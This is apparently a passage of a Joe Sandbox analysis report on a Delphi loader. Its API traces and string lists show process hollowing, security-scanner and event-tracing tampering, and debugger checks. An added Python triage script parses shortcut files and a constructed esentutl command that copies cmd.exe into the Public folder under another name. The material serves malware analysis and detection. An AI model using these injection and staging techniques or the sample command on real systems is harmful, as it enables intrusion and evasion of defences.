  • Part of subcall function 02EDDD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02EDDE1C
  • Part of subcall function 02EDDD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02EDDE25
  • Part of subcall function 02EC7E80: GetFileAttributesA.KERNEL32(00000000,?,02EE356F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,Initialize), ref: 02EC7E8B
  • Part of subcall function 02EC8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02EE370D,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,Initialize,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8), ref: 02EC8055
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
Similarity
• API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
• String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
• API String ID: 297057983-2644593349
• Opcode ID: bf36680a6ae3f62f36893a674fe0f2a5aca8bc8f52dc34412fa977f01a3f40d1
• Instruction ID: 7d20f37c917158f851bfa66a2726ccbdd513986d9f53f69146df7b4435e22cf6
• Opcode Fuzzy Hash: bf36680a6ae3f62f36893a674fe0f2a5aca8bc8f52dc34412fa977f01a3f40d1
• Instruction Fuzzy Hash: B3140D35A8011D8BDB11FBA4DD91ACE73FAFB85304F60E1A9F4099B654DA30AE52CF41
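The String ID list above carries the loader's staging and persistence artefacts: an [InternetShortcut] .url file whose URL=file:" line points at a local executable, the C:\Users\Public\Libraries\ drop directory, and an esentutl.exe /y <src> /d <dst> /o copy command (the fragments "/d " and " /o" are its remaining switches). The Python below is an added example, not part of the Joe Sandbox report and not code from the sample, that parses a .url body and an esentutl command line and flags the properties a responder would triage: a file: target, a target under the Public profile, a path segment with a trailing space (the "DLL Search Order Hijacking Via Additional Space in Path" Sigma hit from the report summary), and a system binary copied under a different name. The .url body and command line are constructed; the file names in them are placeholders, and the choice of cmd.exe as the copied source follows the report's "Drops or copies cmd.exe with a different name" signature rather than anything shown in this section.

```python
import ntpath
import re
from urllib.parse import unquote

# Constructed .url body in the [InternetShortcut] layout the report's strings
# describe (URL=file:", IconIndex=, HotKey=). "example.exe" is a placeholder,
# not a file name recovered from the sample.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    'URL=file:"C:\\Users\\Public\\Libraries\\example.exe"\r\n'
    "IconIndex=0\r\n"
    "HotKey=0\r\n"
)

# Constructed command line assembled from the report's string fragments
# ("...esentutl.exe /y ", "/d ", " /o"). Source and destination are assumptions.
SAMPLE_ESENTUTL_CMD = (
    "C:\\Windows\\System32\\esentutl.exe /y C:\\Windows\\System32\\cmd.exe "
    "/d C:\\Users\\Public\\Libraries\\copy.exe /o"
)

PUBLIC_DIR = "c:\\users\\public\\"


def parse_url_shortcut(text):
    """Key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    section, values = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            values[key.strip().lower()] = value.strip()
    return values


def file_url_target(url):
    """Local path behind a file: URL (None for any other scheme).

    Accepts both the canonical file:///C:/path form and the quoted
    file:"C:\\path" form that the sample's URL=file:" string implies."""
    if not url.lower().startswith("file:"):
        return None
    rest = unquote(url[5:].strip().strip('"')).lstrip("/")
    return rest.replace("/", "\\")


def triage_url_shortcut(text):
    """Flags for one .url body: does it launch a local file, from where, and
    does any path segment end in a space (search-order hijack indicator)."""
    target = file_url_target(parse_url_shortcut(text).get("url", ""))
    lowered = (target or "").lower()
    return {
        "target": target,
        "launches_local_file": target is not None,
        "in_public_dir": lowered.startswith(PUBLIC_DIR),
        "trailing_space_in_path": target is not None
        and any(seg.endswith(" ") for seg in target.split("\\")),
    }


ESENTUTL_RE = re.compile(r"esentutl\.exe\s+/y\s+(.+?)\s+/d\s+(.+?)\s+/o\b", re.I)


def parse_esentutl_copy(cmdline):
    """(source, destination) of an 'esentutl /y SRC /d DST /o' copy, else None."""
    m = ESENTUTL_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


def triage_esentutl_copy(cmdline):
    """Flag a copy that renames the source or lands in the Public profile."""
    parsed = parse_esentutl_copy(cmdline)
    if parsed is None:
        return None
    src, dst = parsed
    return {
        "source": src,
        "destination": dst,
        "renamed": ntpath.basename(src).lower() != ntpath.basename(dst).lower(),
        "dest_in_public": dst.lower().startswith(PUBLIC_DIR),
    }


if __name__ == "__main__":
    print(triage_url_shortcut(SAMPLE_URL_FILE))
    print(triage_esentutl_copy(SAMPLE_ESENTUTL_CMD))
```

Run against a real host, the same two functions can be fed every .url under the user profiles and every esentutl command line from process-creation telemetry; a file: shortcut into C:\Users\Public combined with a renamed system-binary copy into the same directory is the pairing the report's signatures describe.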

Control-flow Graph
[Control-flow graph of the function at 2ed8d70, rendered as an interactive executed/not-executed graph in the original report; the basic-block listing is omitted here. Direct API calls inside the graph: GetThreadContext in block 2ed92e8-2ed9609, and SetThreadContext followed by NtResumeThread in block 2ed9ec3-2eda61b. Subroutines called from the graph: 2ed8788, 2ed8400, 2ed8670, 2ed7a2c, 2ed7d78, 2ed8c80, 2ed894c, 2ed8080, 2ed8b78, 2ed8b6c, 2ec2c2c, 2ec30d4, 2ec2ee0, 2ec2f08, 2ec4500, 2ec44dc, 2ec4c60, 2ec4de0, 2ec4df0, plus the helpers 2ec4860, 2ec49a0, 2ec46d4, 2ec47ec and 2ed89d0 called repeatedly between each API step.]
APIs
  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
  • Part of subcall function 02ED8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02ED8814
• GetThreadContext.KERNEL32(00000888,02F47424,ScanString,02F473A8,02EDA93C,UacInitialize,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,UacInitialize,02F473A8), ref: 02ED9602
  • Part of subcall function 02ED8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED8471
  • Part of subcall function 02ED8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02ED86D5
  • Part of subcall function 02ED7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02ED7A9F
  • Part of subcall function 02ED7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
• SetThreadContext.KERNEL32(00000888,02F47424,ScanBuffer,02F473A8,02EDA93C,ScanString,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,0000088C,00360FF8,02F474FC,00000004,02F47500), ref: 02EDA317
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000888,00000000,00000888,02F47424,ScanBuffer,02F473A8,02EDA93C,ScanString,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,0000088C,00360FF8,02F474FC), ref: 02EDA324
  • Part of subcall function 02ED894C: LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
  • Part of subcall function 02ED894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
  • Part of subcall function 02ED894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                • API String ID: 2388221946-51457883
                                                                                                                • Opcode ID: 51c906482db7313c316300a12346157aa4ecdab3930fe060ca49ab93b0471afa
                                                                                                                • Instruction ID: d920d7ae5e2bd51994a036678fbd65929120ccf97fcdc1b0c48b15e42ba82b6d
                                                                                                                • Opcode Fuzzy Hash: 51c906482db7313c316300a12346157aa4ecdab3930fe060ca49ab93b0471afa
                                                                                                                • Instruction Fuzzy Hash: 5AE20035A801589BDB11FBA4ED90BCEB3B6AF84300F60E1B5B0499B354DA70AE57CF51

Control-flow Graph

Control-flow graph summary for function 02ED8D6E (blocks 2ed8d6e-2eda921; the graph image is rendered as text in the source). Entry 2ed8d6e-2ed8d7d loops, then 2ed8d7f-2ed8e66 calls 02EC4990 and the first of many copies of a seven-call pad (02EC4860, 02EC49A0, 02EC46D4, 02EC47EC, 02EC49A0, 02EC46D4, 02ED89D0, the last containing the FreeLibrary call listed below) that separates every API-bearing call in this function. 2ed8f4d-2ed9275 calls 02EC30D4 twice and ends in 02EC4DE0, 02EC4DF0 and 02ED8788 (CreateProcessAsUserW). 2ed92e8-2ed9609 calls 02EC2EE0, 02EC2F08 and GetThreadContext. 2ed960f-2ed9872 calls 02ED8400 (NtReadVirtualMemory). 2ed9878-2ed99e1 calls 02ED8670 (NtUnmapViewOfSection); 2ed99e3-2ed9a09, 2ed9a7c-2ed9b7d and 2ed9bf0-2ed9d70 each call 02ED7A2C (NtAllocateVirtualMemory). 2ed9d76-2ed9e6f calls 02ED8C80; 2ed9e71-2ed9ebe calls 02ED8B78 and 02ED8B6C. 2ed9ec3-2eda8b2 calls 02ED7D78 (NtWriteVirtualMemory) twice, then SetThreadContext, NtResumeThread, 02EC2C2C, the 02ED894C bcrypt stub more than a dozen times, and 02ED8080. The remaining blocks (2ed9277-2ed92e3, 2ed9a0b-2ed9a76, 2ed9a77, 2ed9b7f-2ed9bea, 2ed9beb) contain only the pad. The API-bearing blocks exit to 2eda8b7-2eda921 (02EC4500, 02EC4C60, 02EC44DC cleanup).
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                  • Part of subcall function 02ED8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02ED8814
                                                                                                                • GetThreadContext.KERNEL32(00000888,02F47424,ScanString,02F473A8,02EDA93C,UacInitialize,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,UacInitialize,02F473A8), ref: 02ED9602
                                                                                                                  • Part of subcall function 02ED8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED8471
                                                                                                                  • Part of subcall function 02ED8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02ED86D5
                                                                                                                  • Part of subcall function 02ED7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02ED7A9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                • API String ID: 3386062106-51457883
                                                                                                                • Opcode ID: a289300c3721ef04332c01e25fa601b0a3f324c517055e09fbf7bde0dbcc510a
                                                                                                                • Instruction ID: 2b4b5f18978fd0816e40d2ca5887ff3c68733cd139f07e13370c601800a33b9c
                                                                                                                • Opcode Fuzzy Hash: a289300c3721ef04332c01e25fa601b0a3f324c517055e09fbf7bde0dbcc510a
                                                                                                                • Instruction Fuzzy Hash: 72E20035A801589BDB11FBA4ED90BCEB3B6AF84300F60E1B5B0499B354DA70AE57CF51

Control-flow Graph

Control-flow graph summary for function 02EC5ACC-02EC5CF9 (the graph image is rendered as text in the source). This is the standard Delphi RTL locale-override lookup and is benign on its own. 2ec5acc-2ec5b0d: GetModuleFileNameA, RegOpenKeyExA on HKCU Software\Borland\Locales; on failure 2ec5b0f-2ec5b2b tries the HKLM key and 2ec5b2d-2ec5b49 tries HKCU Software\Borland\Delphi\Locales. 2ec5b4f-2ec5b92: call 02EC5908, RegQueryValueExA, retried with a second value name at 2ec5b94-2ec5bb0, then RegCloseKey at 2ec5bb6-2ec5bd0. 2ec5bd8-2ec5c09: lstrcpynA, GetThreadLocale, GetLocaleInfoA; 2ec5c1f-2ec5c35 lstrlenA followed by a short loop over 2ec5c37-2ec5c4f. Then up to three lstrcpynA plus LoadLibraryExA attempts (2ec5c5c-2ec5c82, 2ec5c8e-2ec5cbe, 2ec5cc0-2ec5cf0), each falling through to the return block 2ec5cf2-2ec5cf9.
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5AE8
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5B06
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5B24
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02EC5B42
                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02EC5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02EC5B8B
                                                                                                                • RegQueryValueExA.ADVAPI32(?,02EC5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02EC5BD1,?,80000001), ref: 02EC5BA9
                                                                                                                • RegCloseKey.ADVAPI32(?,02EC5BD8,00000000,?,?,00000000,02EC5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02EC5BCB
                                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02EC5BE8
                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02EC5BF5
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02EC5BFB
                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02EC5C26
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EC5C6D
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EC5C7D
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EC5CA5
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EC5CB5
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02EC5CDB
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02EC5CEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                • API String ID: 1759228003-2375825460
                                                                                                                • Opcode ID: 7798c7825a9e5bb3a98639b66603cdd54f05e43244ff6f9fae95cc2c236302ee
                                                                                                                • Instruction ID: afa187e1a2a35b2c1a5653b1cda3ac8cd8793e92152ad4e702fa37ef37d7c6e2
                                                                                                                • Opcode Fuzzy Hash: 7798c7825a9e5bb3a98639b66603cdd54f05e43244ff6f9fae95cc2c236302ee
                                                                                                                • Instruction Fuzzy Hash: 14511D71A8024C7EFB25D6E4CD45FEF77AC9B04344FA091A9BA08F6181D774EA468F60

Control-flow Graph

Control-flow graph summary for stub 02ED894C (the graph image is rendered as text in the source). 2ed894c-2ed8971 LoadLibraryW; on failure it jumps straight to the return block 2ed89bb-2ed89c1. 2ed8973-2ed898b GetProcAddress; on success 2ed898d-2ed89ac calls 02ED7D78 (the wrapper containing NtWriteVirtualMemory), optionally through 2ed89ae, then 2ed89b0-2ed89b6 FreeLibrary and return. Note that the library is freed only after the resolved export has been handed to the NtWriteVirtualMemory wrapper.
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
                                                                                                                • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                  • Part of subcall function 02ED7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                • String ID: BCryptVerifySignature$bcrypt
                                                                                                                • API String ID: 1002360270-4067648912
                                                                                                                • Opcode ID: 208eeaa5834835de414608ccac7a1d48fe6610e32474860d503147cf71e65127
                                                                                                                • Instruction ID: 8bc808925e4681d8657e180f56d80e51c55b7a5ea07325c01e8495c4a23f5f1f
                                                                                                                • Opcode Fuzzy Hash: 208eeaa5834835de414608ccac7a1d48fe6610e32474860d503147cf71e65127
                                                                                                                • Instruction Fuzzy Hash: BCF0AFF5AC03185EE310B7A8A889F77F7DC97A179CF005969B90C87140C7F068528B90

Control-flow Graph (graph image not extracted; basic blocks and edges recovered from the graph data)
• 13222: 2edf744-2edf75e GetModuleHandleW -> 13223, 13224
• 13224: 2edf760-2edf772 GetProcAddress -> 13223, 13225
• 13225: 2edf774-2edf784 CheckRemoteDebuggerPresent -> 13223, 13226
• 13226: 2edf786 -> 13223
• 13223: 2edf78a-2edf792
APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 02EDF754
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02EDF766
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02EDF77D
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669
• Opcode ID: b771b83de3e3d8766eced4b4e86ae9bbdddf95abcd80c3265e32124976f44e05
• Instruction ID: 1484ce592f13ebdd5deff76ec26af92d93df3240d35557d4041e9df55733ee4e
• Opcode Fuzzy Hash: b771b83de3e3d8766eced4b4e86ae9bbdddf95abcd80c3265e32124976f44e05
• Instruction Fuzzy Hash: 95F0A770944248BAEB10E7F888887DDFBA95B0932CF249394E436665C1E7710641CA61

Control-flow Graph (graph image not extracted)
APIs
  • Part of subcall function 02EC4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EC4F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDE40), ref: 02EDDDAB
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02EDDE40), ref: 02EDDDDB
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02EDDDF0
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02EDDE1C
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02EDDE25
  • Part of subcall function 02EC4C60: SysFreeString.OLEAUT32(02EDF4A4), ref: 02EC4C6E
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
• Opcode ID: a4c16caef25de9f12cf7b9a0a67d52a0db71d15ba5c74ed782bbf0d87ee8f05d
• Instruction ID: 2f23e145a5c1304a64d44b7727e161631db1c16225beceab7e427cd4582d83c8
• Opcode Fuzzy Hash: a4c16caef25de9f12cf7b9a0a67d52a0db71d15ba5c74ed782bbf0d87ee8f05d
• Instruction Fuzzy Hash: E9210376A80308BEEB11EAE4CD52FDE77BDEB48700F505465B600F71C0DA74AA068B54

Control-flow Graph (graph image not extracted)
APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02EDE5F6
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 83e29477fd1996d1fa75e44f52ed3bb209fe27ff7675721726e4c892ada6406f
• Instruction ID: eb9c4411a516ce80870fb177f4802288209a2db85141605308c786ec47c7e738
